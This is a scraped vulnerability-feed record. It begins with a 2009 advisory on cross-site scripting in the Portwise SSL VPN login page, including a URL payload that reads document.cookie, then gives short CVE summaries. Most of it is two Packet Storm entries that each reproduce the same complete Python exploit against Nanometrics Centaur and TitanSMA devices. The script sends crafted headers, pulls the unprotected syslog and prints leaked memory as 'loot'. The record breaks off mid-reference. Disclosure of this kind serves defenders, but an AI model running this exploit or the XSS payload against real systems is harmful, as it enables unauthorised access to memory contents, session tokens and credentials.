An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link to a Portwise Portal-based
site. Such
code would run within the security context of the target domain. This
type of attack can result in non-persistent defacement of the target
site, or the
redirection of confidential information (i.e.: session IDs) to
unauthorised third parties.
Fix:
Ensure all input parameters (especially "reloadFrame") are filtered
sufficiently before beign echoed back to the client.
References:
http://www.procheckup.com/Vulnerabilities.php
Credits: George Christopoulos and Jan Fry of ProCheckUp Ltd
(www.procheckup.com)
Legal:
Copyright 2009 Procheckup Ltd. All rights reserved.
Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if, the
Bulletin is not edited or changed in any way, is attributed to
Procheckup, and provided such reproduction and/or distribution is
performed for non-
commercial purposes.
Any other use of this information is prohibited. Procheckup is not
liable for any misuse of this information by any third party.
{"id": "SECURITYVULNS:DOC:23264", "bulletinFamily": "software", "title": "Cross-Site Scriting on Portwise SSL VPN v4.6", "description": "PR09-04: Cross-Site Scriting on Portwise SSL VPN v4.6\r\n\r\nVulnerability found: 25th March 2009\r\n\r\nVendor informed: 28th April 2009\r\n\r\nVulnerability fixed:\r\n\r\nSeverity: Medium\r\n\r\nDescription:\r\n\r\nThe Portwise portal login page is vulnerable to XSS. Portwise is a\r\nSSL-VPN portal.\r\n\r\n\r\nNote: Other version might be affected as well\r\n\r\n\r\nThe following demonstrate XSS:\r\n\r\n1) Login page XSS\r\n\r\nhttps://example.com/wa/auth?&authmech=Assess&reloadFrame=%22;%3Cscript%3Eblah%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E\r\n\r\n\r\n\r\nConsequences:\r\n\r\nAn attacker may be able to cause execution of malicious scripting code\r\nin the browser of a user who clicks on a link to a Portwise Portal-based\r\nsite. Such\r\n\r\ncode would run within the security context of the target domain. This\r\ntype of attack can result in non-persistent defacement of the target\r\nsite, or the\r\n\r\nredirection of confidential information (i.e.: session IDs) to\r\nunauthorised third parties.\r\n\r\n\r\n\r\nFix:\r\n\r\nEnsure all input parameters (especially "reloadFrame") are filtered\r\nsufficiently before beign echoed back to the client.\r\n\r\n\r\nReferences:\r\n\r\nhttp://www.procheckup.com/Vulnerabilities.php\r\n\r\n\r\n\r\nCredits: George Christopoulos and Jan Fry of ProCheckUp Ltd\r\n(www.procheckup.com)\r\n\r\n\r\nLegal:\r\n\r\nCopyright 2009 Procheckup Ltd. All rights reserved.\r\n\r\nPermission is granted for copying and circulating this Bulletin to the\r\nInternet community for the purpose of alerting them to problems, if and\r\nonly if, the\r\n\r\nBulletin is not edited or changed in any way, is attributed to\r\nProcheckup, and provided such reproduction and/or distribution is\r\nperformed for non-\r\n\r\ncommercial purposes.\r\n\r\nAny other use of this information is prohibited. Procheckup is not\r\nliable for any misuse of this information by any third party.", "published": "2010-02-22T00:00:00", "modified": "2010-02-22T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23264", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:33", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "768866368154cbd7c6c9626cea563792"}, {"key": "href", "hash": "c7279f288b43264e8403abc15c6b4d03"}, {"key": "modified", "hash": "359478b76108678c77569d7c7ff9e603"}, {"key": "published", "hash": "359478b76108678c77569d7c7ff9e603"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "36714aa10664fcd8e956240e82871704"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "91da91c97134cfad7c3669df60a1d55bb917c6737aff270dce86cf88b5fe7a95", "viewCount": 8, "enchantments": {"score": {"value": 2.9, "vector": "NONE", "modified": "2018-08-31T11:10:33"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310852529", "OPENVAS:1361412562310852527"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1485-1", "OPENSUSE-SU-2019:1481-1", "OPENSUSE-SU-2019:1479-1"]}, {"type": "ubuntu", "idList": ["USN-3996-1"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994293"]}, {"type": "zdt", "idList": ["1337DAY-ID-32799", "1337DAY-ID-32772", "1337DAY-ID-32775", "1337DAY-ID-32771", "1337DAY-ID-32767", "1337DAY-ID-32754", "1337DAY-ID-32753", "1337DAY-ID-32757", "1337DAY-ID-32725", "1337DAY-ID-32724"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152997"]}, {"type": "kitploit", "idList": ["KITPLOIT:3928947731225997712"]}], "modified": "2018-08-31T11:10:33"}, "vulnersScore": 2.9}, "objectVersion": "1.3", "affectedSoftware": []}
{"cve": [{"lastseen": "2020-02-22T13:07:25", "bulletinFamily": "NVD", "description": "Kernel/Modules/AgentTicketWatcher.pm in Open Ticket Request System (OTRS) 3.0.x before 3.0.21, 3.1.x before 3.1.17, and 3.2.x before 3.2.8 does not properly restrict tickets, which allows remote attackers with a valid agent login to read restricted tickets via a crafted URL involving the ticket split mechanism.", "modified": "2020-02-21T16:17:00", "id": "CVE-2013-4088", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4088", "published": "2020-02-21T16:15:00", "title": "CVE-2013-4088", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-22T13:07:25", "bulletinFamily": "NVD", "description": "Kernel/Modules/AgentTicketPhone.pm in Open Ticket Request System (OTRS) 3.0.x before 3.0.20, 3.1.x before 3.1.16, and 3.2.x before 3.2.7, and OTRS ITSM 3.0.x before 3.0.8, 3.1.x before 3.1.9, and 3.2.x before 3.2.5 does not properly restrict tickets, which allows remote attackers with a valid agent login to read restricted tickets via a crafted URL involving the ticket split mechanism.", "modified": "2020-02-21T16:17:00", "id": "CVE-2013-3551", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3551", "published": "2020-02-21T16:15:00", "title": "CVE-2013-3551", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-21T13:06:30", "bulletinFamily": "NVD", "description": "The CGIHTTPServer module in Python 2.7.5 and 3.3.4 does not properly handle URLs in which URL encoding is used for path separators, which allows remote attackers to read script source code or conduct directory traversal attacks and execute unintended code via a crafted character sequence, as demonstrated by a %2f separator.", "modified": "2020-02-20T17:18:00", "id": "CVE-2014-4650", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4650", "published": "2020-02-20T17:15:00", "title": "CVE-2014-4650", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-21T13:06:33", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in the Android debug bridge (aka adb) in Android 4.0.4 allows physically proximate attackers with a direct connection to the target Android device to write to arbitrary files owned by system via a .. (dot dot) in the tar archive headers.", "modified": "2020-02-20T16:27:00", "published": "2020-02-20T16:15:00", "id": "CVE-2014-7951", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7951", "title": "CVE-2014-7951", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-21T13:06:28", "bulletinFamily": "NVD", "description": "Multiple stack-based buffer overflows in the __dn_expand function in network/dn_expand.c in musl libc 1.1x before 1.1.2 and 0.9.13 through 1.0.3 allow remote attackers to (1) have unspecified impact via an invalid name length in a DNS response or (2) cause a denial of service (crash) via an invalid name length in a DNS response, related to an infinite loop with no output.", "modified": "2020-02-20T13:07:00", "id": "CVE-2014-3484", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3484", "published": "2020-02-20T04:15:00", "title": "CVE-2014-3484", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-21T13:08:35", "bulletinFamily": "NVD", "description": "The Neighbor Discovery (ND) protocol implementation in the IPv6 stack in FreeBSD through 10.1 allows remote attackers to reconfigure a hop-limit setting via a small hop_limit value in a Router Advertisement (RA) message.", "modified": "2020-02-20T13:07:00", "published": "2020-02-20T04:15:00", "id": "CVE-2015-2923", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2923", "title": "CVE-2015-2923", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-20T13:35:09", "bulletinFamily": "NVD", "description": "Buffer overflow in the afReadFrames function in audiofile (aka libaudiofile and Audio File Library) allows user-assisted remote attackers to cause a denial of service (program crash) or possibly execute arbitrary code via a crafted audio file, as demonstrated by sixteen-stereo-to-eight-mono.c.", "modified": "2020-02-19T21:20:00", "id": "CVE-2015-7747", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7747", "published": "2020-02-19T21:15:00", "title": "CVE-2015-7747", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-20T13:36:29", "bulletinFamily": "NVD", "description": "OverlayFS in the Linux kernel before 3.0.0-16.28, as used in Ubuntu 10.0.4 LTS and 11.10, is missing inode security checks which could allow attackers to bypass security restrictions and perform unauthorized actions.", "modified": "2020-02-19T18:50:00", "id": "CVE-2012-0055", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0055", "published": "2020-02-19T18:15:00", "title": "CVE-2012-0055", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-20T13:36:40", "bulletinFamily": "NVD", "description": "Nokogiri before 1.5.4 is vulnerable to XXE attacks", "modified": "2020-02-19T15:19:00", "published": "2020-02-19T15:15:00", "id": "CVE-2012-6685", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6685", "title": "CVE-2012-6685", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-20T13:38:02", "bulletinFamily": "NVD", "description": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", "modified": "2020-02-19T15:15:00", "published": "2020-02-19T15:15:00", "id": "CVE-2013-5581", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5581", "title": "CVE-2013-5581", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2020-02-20T07:06:03", "bulletinFamily": "exploit", "description": "", "modified": "2020-02-19T00:00:00", "published": "2020-02-19T00:00:00", "id": "PACKETSTORM:156414", "href": "https://packetstormsecurity.com/files/156414/Nanometrics-Centaur-4.3.23-Memory-Leak.html", "title": "Nanometrics Centaur 4.3.23 Memory Leak", "type": "packetstorm", "sourceData": "`# Exploit Title: Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak \n# Date: 2020-02-15 \n# Author: byteGoblin \n# Vendor: https://www.nanometrics.ca \n# Product: https://www.nanometrics.ca/products/accelerometers/titan-sma \n# Product: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder \n# CVE: N/A \n# \n# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit \n# \n# \n# Vendor: Nanometrics Inc. \n# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma \n# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder \n# \n# Affected versions: \n# Centaur <= 4.3.23 \n# TitanSMA <= 4.2.20 \n# \n# Summary: \n# The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists \n# of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. \n# Its ease of use simplifies high performance geophysical sensing deplayments in both remote and \n# networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for \n# infrasound and similar geophysical sensor recording applications requiring sample rates up to \n# 5000 sps. \n# \n# Summary: \n# The TitanSMA is a strong motion accelerograph designed for high precision observational and \n# structural engineering applications, where scientists and engineers require exceptional dynamic \n# range over a wide frequency band. \n# \n# Description: \n# An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect \n# critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) \n# suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. \n# As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. \n# Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP \n# packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system \n# logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent \n# packet) which can be combined to leak sensitive data which can be used to perform session hijacking \n# and authentication bypass scenarios. \n# \n# Tested on: \n# Jetty 9.4.z-SNAPSHOT \n# \n# Vulnerability discovered by: \n# byteGoblin @ zeroscience.mk \n# \n# \n# Advisory ID: ZSL-2020-5562 \n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php \n# \n# Related CVE: CVE-2015-2080 \n# Related CWE: CWE-532, CWE-538 \n# \n# 10.02.2020 \n# \n \n#!/usr/bin/env python3 \n \nimport requests \nimport re \nimport sys \n \nclass Goblin: \ndef __init__(self): \nself.host = None \nself.page = \"/zsl\" \nself.syslog = \"/logs/syslog\" \nself.buffer_pad = \"A\" * 70 \nself.buffer = None \nself.payload = \"\\xFF\" \nself.payloads_to_send = 70 # 70 seems to be a good number before we get weird results \nself.body = {} \nself.headers = None \nself.syslog_data = {} \nself.last_line = None \nself.before_last_line = True \n \ndef banner(self): \ngoblin = \"\"\" \nNN \nNkllON \n0;;::k000XN KxllokN \n0;,:,;;;;:ldK Kdccc::oK \nNx,';codddl:::dkdc:c:;lON \nklc:clloooooooc,.':lc;'lX \nx;:ooololccllc:,:ll:,:xX \nKd:cllc'..';:ccclc,.x _ . ___ _ . \nNOoc::c:,'';:ccllc::''k \\ ___ , . _/_ ___ .' \\ __. \\ ___ | ` , __ \nNklc:clccc;.;odoollc:',xN |/ \\ | ` | .' ` | .' \\ |/ \\ | | |' `. \n0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | | \n0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \\__/ `.___, `.___| `._.' `___,' /\\__ / / | \nNc'clc;..,,,:::c:;;;,'..:oddoc;c0 \\___/ \nNl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed// \nXxclkXk;'::,,,''';:::;'''...'',:o0 \nKl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin \nO,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin <at> zeroscience.mk \nKdcccccdl'';;..'::;;,,,;:::;,'..;:.;K \nd;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. - nanometrics.ca \nOddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA \nd...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20 \n0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK \n0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A \n0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php \n:,;okxdc,..,,..lK Xkol;:x0kl;;::;':0 \nx:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product \nXx:,'':xk:..,''lK Y k;';;';xX \nXOkkko'.....'O d.';;,,:xN \n0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._ \nXOkkkkkON \n\"\"\" \nprint(goblin) \n \ndef generate_payload(self, amount_of_bytes): \nself.payload += \"\\x00\" * amount_of_bytes \nself.headers = {\"Cookie\": self.buffer_pad, \"Referer\": self.payload} \n \ndef read_syslog(self, initial=False): \n# Read syslog remotely and filter out 'HeapByteBuffer' messages. \n# 'initial' is used to make a 'snapshot' of the state before we send payloads... \n# That way we can filter on what we've just sent. \nprint(\"[!] - Grabbing syslog from: {}{}\".format(self.host, self.syslog)) \nbuffer = \"\" \nr = requests.get(self.host + self.syslog) \nif r.status_code == 200: \nprint(\"[!] - We got syslog, it is: {} bytes\".format(len(r.content))) \nsplit = r.text.split(\"\\n\") \nfor line in split: \nif \"HeapByteBuffer\" in line: \nif initial: \nself.last_line = line \nelse: \nif line == self.last_line: \nself.before_last_line = False \nif not self.before_last_line: \nbuffer_addr = re.search(\"\\@\\w+\", line).group(0).strip(\"@\") \ntry: \nleak = re.search(\">>>.+(?=\\.\\.\\.)\", line).group(0).strip(\">>>\") \nbuffer += leak \nexcept Exception as e: \nprint(e) \nif initial: \nreturn self.last_line \nself.buffer = buffer \nelse: # we can't access syslog? \nprint(\"[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...\") \nprint(\"[!!!] - The status code we got was: {}\".format(r.status_code)) \nexit(-1) \n \ndef show_output(self): \n# we need to translate '\\r\\n' into actual newlines \nif self.buffer is not None and self.buffer is not \"\": \nself.buffer = self.buffer.replace(\"\\\\n\", \"\\n\") \nself.buffer = self.buffer.replace(\"\\\\r\", \"\\r\") \nself.buffer = self.buffer.replace(\"%2f\", \"/\") \n \nprint(\"[*] BUFFER LENGTH: {}\".format(len(self.buffer))) \nprint(\"=\" * 50) \nprint(\"[*] THIS IS THE LOOT\") \nprint(\"=\" * 50) \nfor num, x in enumerate(self.buffer.split(\"\\n\")): \nprint(\"{}.\\t| \\t{}\".format(num, x)) \n \ndef send_payload(self, amount): \nprint(\"[!] - Sending payloads to target: {}{}\".format(self.host, self.page)) \nif amount > self.payloads_to_send or amount < 0: \namount = self.payloads_to_send \nfor num, x in enumerate(range(0, amount)): \nif num % 10 == 0: \nprint(\"[!] - [{}/{}] payloads sent...\".format(num, amount)) \ntry: \nself.generate_payload(17) \nr = requests.post(self.host + self.page, data=self.body, headers=self.headers) \nexcept Exception as e: \nprint(e) \nprint(\"[!] - [{}/{}] payloads sent...\".format(amount, amount)) \n \ndef parse_sys_args(self): \nif len(sys.argv) >= 2: \nself.host = sys.argv[1] \nif not \"http\" in self.host: \nself.host = \"http://{}\".format(self.host) \nif len(sys.argv) == 3: \n# amount of packets to send \nself.payloads_to_send = sys.argv[2] \nelse: \nself.print_help() \n \ndef print_help(self): \nprint(\"Usage: {} <ip_addr[:port]> [amount of payloads to send]\".format(sys.argv[0])) \nprint(\"Example: centaur3.py 123.456.789.0:8080 200\") \nprint(\"\\tThis will send 200 payloads to the aforementioned host\") \nprint(\"\\tThe [port] and [amount of payloads] are optional\") \nexit(-1) \n \ndef main(self): \nself.parse_sys_args() \nself.banner() \nll = self.read_syslog(initial=True) \nself.send_payload(70) \nself.read_syslog() \nself.show_output() \n \nif __name__ == '__main__': \nGoblin().main() \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/156414/nanometricscentaur4323-leak.txt"}, {"lastseen": "2020-02-18T06:47:25", "bulletinFamily": "exploit", "description": "", "modified": "2020-02-17T00:00:00", "published": "2020-02-17T00:00:00", "id": "PACKETSTORM:156387", "href": "https://packetstormsecurity.com/files/156387/Nanometrics-Centaur-TitanSMA-Unauthenticated-Remote-Memory-Leak.html", "title": "Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak", "type": "packetstorm", "sourceData": "`Title: Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit \nAdvisory ID: ZSL-2020-5562 \nType: Local/Remote \nImpact: System Access, DoS, Exposure of System Information, Exposure of Sensitive Information \nRisk: (5/5) \nRelease Date: 15.02.2020 \n \nSummary \n \nThe Centaur digital recorder is a portable geophysical sensing acquisition system that consists of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. Its ease of use simplifies high performance geophysical sensing deployments in both remote and networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for infrasound and similar geophysical sensor recording applications requiring sample rates up to 5000 sps. \n \nThe TitanSMA is a strong motion accelerograph designed for high precision observational and structural engineering applications, where scientists and engineers require exceptional dynamic range over a wide frequency band. \nDescription \nAn information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent packet) which can be combined to leak sensitive data which can be used to perform session hijacking and authentication bypass scenarios. \n \nVendor \n \nNanometrics Inc. - https://www.nanometrics.ca \n \nAffected Version \n \nCentaur <= 4.3.23 \nTitanSMA <= 4.2.20 \nTested On \nJetty 9.4.z-SNAPSHOT \n \nVendor Status \n \n[10.02.2020] Vulnerabilities discovered. \n[10.02.2020] Vendor contacted. \n[14.02.2020] No response from the vendor. \n[15.02.2020] Public security advisory released. \n \nPoC \n \n#!/usr/bin/env python3 \n# \n# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit \n# \n# \n# Vendor: Nanometrics Inc. \n# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma \n# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder \n# \n# Affected versions: \n# Centaur <= 4.3.23 \n# TitanSMA <= 4.2.20 \n# \n# Summary: \n# The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists \n# of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. \n# Its ease of use simplifies high performance geophysical sensing deplayments in both remote and \n# networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for \n# infrasound and similar geophysical sensor recording applications requiring sample rates up to \n# 5000 sps. \n# \n# Summary: \n# The TitanSMA is a strong motion accelerograph designed for high precision observational and \n# structural engineering applications, where scientists and engineers require exceptional dynamic \n# range over a wide frequency band. \n# \n# Description: \n# An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect \n# critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) \n# suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. \n# As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. \n# Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP \n# packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system \n# logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent \n# packet) which can be combined to leak sensitive data which can be used to perform session hijacking \n# and authentication bypass scenarios. \n# \n# Tested on: \n# Jetty 9.4.z-SNAPSHOT \n# \n# Vulnerability discovered by: \n# byteGoblin @ zeroscience.mk \n# \n# \n# Advisory ID: ZSL-2020-5562 \n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php \n# \n# Related CVE: CVE-2015-2080 \n# Related CWE: CWE-532, CWE-538 \n# \n# 10.02.2020 \n# \n \nimport requests \nimport re \nimport sys \n \nclass Goblin: \ndef __init__(self): \nself.host = None \nself.page = \"/zsl\" \nself.syslog = \"/logs/syslog\" \nself.buffer_pad = \"A\" * 70 \nself.buffer = None \nself.payload = \"\\xFF\" \nself.payloads_to_send = 70 # 70 seems to be a good number before we get weird results \nself.body = {} \nself.headers = None \nself.syslog_data = {} \nself.last_line = None \nself.before_last_line = True \n \ndef banner(self): \ngoblin = \"\"\" \nNN \nNkllON \n0;;::k000XN KxllokN \n0;,:,;;;;:ldK Kdccc::oK \nNx,';codddl:::dkdc:c:;lON \nklc:clloooooooc,.':lc;'lX \nx;:ooololccllc:,:ll:,:xX \nKd:cllc'..';:ccclc,.x _ . ___ _ . \nNOoc::c:,'';:ccllc::''k \\ ___ , . _/_ ___ .' \\ __. \\ ___ | ` , __ \nNklc:clccc;.;odoollc:',xN |/ \\ | ` | .' ` | .' \\ |/ \\ | | |' `. \n0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | | \n0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \\__/ `.___, `.___| `._.' `___,' /\\__ / / | \nNc'clc;..,,,:::c:;;;,'..:oddoc;c0 \\___/ \nNl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed// \nXxclkXk;'::,,,''';:::;'''...'',:o0 \nKl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin \nO,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin <at> zeroscience.mk \nKdcccccdl'';;..'::;;,,,;:::;,'..;:.;K \nd;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. - nanometrics.ca \nOddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA \nd...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20 \n0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK \n0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A \n0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php \n:,;okxdc,..,,..lK Xkol;:x0kl;;::;':0 \nx:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product \nXx:,'':xk:..,''lK Y k;';;';xX \nXOkkko'.....'O d.';;,,:xN \n0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._ \nXOkkkkkON \n\"\"\" \nprint(goblin) \n \ndef generate_payload(self, amount_of_bytes): \nself.payload += \"\\x00\" * amount_of_bytes \nself.headers = {\"Cookie\": self.buffer_pad, \"Referer\": self.payload} \n \ndef read_syslog(self, initial=False): \n# Read syslog remotely and filter out 'HeapByteBuffer' messages. \n# 'initial' is used to make a 'snapshot' of the state before we send payloads... \n# That way we can filter on what we've just sent. \nprint(\"[!] - Grabbing syslog from: {}{}\".format(self.host, self.syslog)) \nbuffer = \"\" \nr = requests.get(self.host + self.syslog) \nif r.status_code == 200: \nprint(\"[!] - We got syslog, it is: {} bytes\".format(len(r.content))) \nsplit = r.text.split(\"\\n\") \nfor line in split: \nif \"HeapByteBuffer\" in line: \nif initial: \nself.last_line = line \nelse: \nif line == self.last_line: \nself.before_last_line = False \nif not self.before_last_line: \nbuffer_addr = re.search(\"\\@\\w+\", line).group(0).strip(\"@\") \ntry: \nleak = re.search(\">>>.+(?=\\.\\.\\.)\", line).group(0).strip(\">>>\") \nbuffer += leak \nexcept Exception as e: \nprint(e) \nif initial: \nreturn self.last_line \nself.buffer = buffer \nelse: # we can't access syslog? \nprint(\"[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...\") \nprint(\"[!!!] - The status code we got was: {}\".format(r.status_code)) \nexit(-1) \n \ndef show_output(self): \n# we need to translate '\\r\\n' into actual newlines \nif self.buffer is not None and self.buffer is not \"\": \nself.buffer = self.buffer.replace(\"\\\\n\", \"\\n\") \nself.buffer = self.buffer.replace(\"\\\\r\", \"\\r\") \nself.buffer = self.buffer.replace(\"%2f\", \"/\") \n \nprint(\"[*] BUFFER LENGTH: {}\".format(len(self.buffer))) \nprint(\"=\" * 50) \nprint(\"[*] THIS IS THE LOOT\") \nprint(\"=\" * 50) \nfor num, x in enumerate(self.buffer.split(\"\\n\")): \nprint(\"{}.\\t| \\t{}\".format(num, x)) \n \ndef send_payload(self, amount): \nprint(\"[!] - Sending payloads to target: {}{}\".format(self.host, self.page)) \nif amount > self.payloads_to_send or amount < 0: \namount = self.payloads_to_send \nfor num, x in enumerate(range(0, amount)): \nif num % 10 == 0: \nprint(\"[!] - [{}/{}] payloads sent...\".format(num, amount)) \ntry: \nself.generate_payload(17) \nr = requests.post(self.host + self.page, data=self.body, headers=self.headers) \nexcept Exception as e: \nprint(e) \nprint(\"[!] - [{}/{}] payloads sent...\".format(amount, amount)) \n \ndef parse_sys_args(self): \nif len(sys.argv) >= 2: \nself.host = sys.argv[1] \nif not \"http\" in self.host: \nself.host = \"http://{}\".format(self.host) \nif len(sys.argv) == 3: \n# amount of packets to send \nself.payloads_to_send = sys.argv[2] \nelse: \nself.print_help() \n \ndef print_help(self): \nprint(\"Usage: {} <ip_addr[:port]> [amount of payloads to send]\".format(sys.argv[0])) \nprint(\"Example: centaur3.py 123.456.789.0:8080 200\") \nprint(\"\\tThis will send 200 payloads to the aforementioned host\") \nprint(\"\\tThe [port] and [amount of payloads] are optional\") \nexit(-1) \n \ndef main(self): \nself.parse_sys_args() \nself.banner() \nll = self.read_syslog(initial=True) \nself.send_payload(70) \nself.read_syslog() \nself.show_output() \n \nif __name__ == '__main__': \nGoblin().main() \n \nCredits \n \nVulnerability discovered by byteGoblin - <bytegoblin@zeroscience.mk> \n \nReferences \n \n[1] https://nvd.nist.gov/vuln/detail/CVE-2015-2080 \n[2] 